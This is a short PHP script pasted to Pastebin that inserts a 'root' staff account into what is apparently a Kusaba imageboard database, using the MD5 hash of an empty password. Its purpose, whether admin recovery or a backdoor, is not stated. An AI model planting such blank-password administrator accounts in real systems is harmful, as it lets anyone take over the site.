jmyeom

Untitled

Jan 30th, 2013
67
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.24 KB | None | 0 0
  1. <?php
  2.  
  3. include 'config.php';
  4.  
  5. $tc_db->Execute("INSERT INTO `".KU_DBPREFIX."staff` (`username`, `password`, `salt`, `type`, `boards`, `addedon`, `lastactive`) VALUES ('root', 'd41d8cd98f00b204e9800998ecf8427e', '', '1', NULL, '0', '0');");
  6. ?>
Advertisement
Add Comment
Please, Sign In to add comment